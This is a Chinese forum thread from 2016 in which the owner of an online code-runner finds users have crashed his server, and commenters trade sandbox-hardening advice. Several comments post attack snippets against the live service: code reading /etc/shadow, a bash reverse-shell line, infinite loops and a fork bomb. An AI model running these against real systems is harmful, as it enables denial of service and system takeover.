这是一个创建于 3141 天前的主题,其中的信息可能已经有所发展或是发生改变。
第 1 条附言 · 2016-04-01 23:04:21 +08:00
把我服务器弄死的兄弟,能把过程发到我邮箱吗? jsw#live.com 谢谢
目前所知的我的几点问题
1 不该用 root 跑 docker
2 未限制每个 docker 的资源
3 程序对危险函数未做处理。
目前所知的我的几点问题
1 不该用 root 跑 docker
2 未限制每个 docker 的资源
3 程序对危险函数未做处理。
 |
1
ykjsw OP 谁这么狠。。。
<?php while(True){ pass; } |
 |
3
dixyes 2016-04-01 16:44:22 +08:00
#include <stdlib.h>
int main () {system("cat /etc/shadow");return 0;} 可怕 |
 |
5
Havee 2016-04-01 16:48:53 +08:00
弄不到 root 权限让它关机啊
|
 |
8
UnisandK 2016-04-01 16:55:15 +08:00
试试递归 POST 怎么样?每个实例 while true 执行 POST 模拟“编译”的请求,请求编译的内容即执行这个循环代码本身,这样实例的数量会直接几何增长
|
 |
10
wph95 2016-04-01 16:55:46 +08:00
:)
不知道是不是爆破成功 反正已经很卡了 快去修吧 |
|
11
ykjsw OP 我错了,刚刚关掉了,改天再来和你们玩。。。
|
 |
12
ahcat 2016-04-01 16:56:28 +08:00
上不了了
|
|
16
wph95 2016-04-01 16:58:47 +08:00
@dixyes 并没有说起来那么简单的,像 php java 这种丧病语言 system 调用各种多,做个白名单非常麻烦的,随便砍系统调用,调用库 分分钟出现奇怪的 RE 。
|
 |
20
SwimmingTiger 2016-04-01 17:04:08 +08:00
开个虚拟机在里面运行啊。虚拟机挂掉了自动重启~
|
 |
21
gamexg 2016-04-01 17:04:36 +08:00 via Android
@dixyes 禁函数效果不好, sae php 都被乌云报过安全环境逃逸, docker 之类的系统级安全限制比较可靠些,内核 bug 才会出现问题。还可以实现限制 cpu 内存等资源。
|
 |
22
ipeony 2016-04-01 17:04:43 +08:00
打不开了?江苏电信
|
|
24
ykjsw OP 现在机器已经起不来了, docker 刚刚用,也没隔离好,感谢大家给我上了一课。
|
 |
25
yvanhe 2016-04-01 17:24:44 +08:00
看到标题就知道会发生什么了:joy:
|
 |
26
droiz 2016-04-01 17:38:06 +08:00
打不开啊 ,已经被玩坏了吗
|
 |
27
davidx 2016-04-01 20:29:03 +08:00
我来晚了么...
|
 |
28
twor2 2016-04-01 20:35:47 +08:00
测试圆满成功
|
 |
29
SlipStupig 2016-04-01 22:09:24 +08:00
bash -i >& /dev/tcp/your ip/your port 0>&1 解决控制系统
|
 |
30
techmoe 2016-04-01 22:39:11 +08:00
2333333
|
 |
31
virusdefender 2016-04-01 22:40:34 +08:00
|
|
32
virusdefender 2016-04-01 22:43:02 +08:00
我这里还有整套的 OnlineJudge 解决方案 https://github.com/QingdaoU/OnlineJudge
同求测试 https://qduoj.com/problems/ 账号 v2ex(都是小写) 密码 123456 |
 |
33
denghongcai 2016-04-01 22:51:59 +08:00  1
docker 里跑, LXC 把资源限制死,容器大小用 brtfs 策略限制或者直接用 devicemapper 做底层驱动
|
|
34
virusdefender 2016-04-01 23:08:34 +08:00
1 不该用 root 跑 docker
docker 好像必须 root 吧,你说的 docker 里面么?那个可以使用降权用户的。 2 未限制每个 docker 的资源 这个是的 3 程序对危险函数未做处理。 危险函数是过滤不完的,过滤系统调用最简单。 --- 我没看到你的网站,能编译 C/C++么,有些代码可以卡死编译器的。 |
|
35
ykjsw OP @virusdefender c\c++ python lua java swift 等,基本常见的都可以跑
不是 docker 守护近程,是执行的那个,可以用其他用户跑的,我是因为一个权限问题,偷懒,直接改成 root 跑了 3 嗯,确实不可能 disable 完,我看到有个用禁止 sys_call 的方法(好像这么叫),但不知道怎么弄。。。 |
|
36
virusdefender 2016-04-01 23:17:07 +08:00
|
|
37
ykjsw OP @virusdefender 好的
|
 |
39
xiaozi 2016-04-01 23:56:19 +08:00
|
 |
40
livc 2016-04-02 00:47:27 +08:00 via Android
|
|
41
wph95 2016-04-02 11:12:05 +08:00 2
@ykjsw virusdefender 的方案是不错的
但是如果你支持的语言越多 seccomp 白名单就得做的越多 白名单是很不靠谱的,非常容易误杀掉语言的一些特性。 比如你把 fork 给 ban 掉, java 性能锐减,而且会出现很多奇怪的错误。 用 docker 自身安全就好。 昨天我就随便写了个 fork 炸弹,目测就把你这个东西炸坏了。 // docker 1.10 防 fork 炸弹真心方便,想当年 1.0 时代。。。。 用 root 跑 docker ,这个真没有问题,就算你是用 docker 组的用户,他要是跑出来都是能修改 cgroups 的 问题在千万不要 docker 不安全容器用 root 权限执行,是一个大幅度提升危险的举措。 |
 |
42
tuuuz 2016-04-02 12:53:23 +08:00
哈哈 评论看下来充满喜感
|
 |
43
bwangel 2016-04-02 16:22:41 +08:00
我去,看起来好腻害!
|
Select Language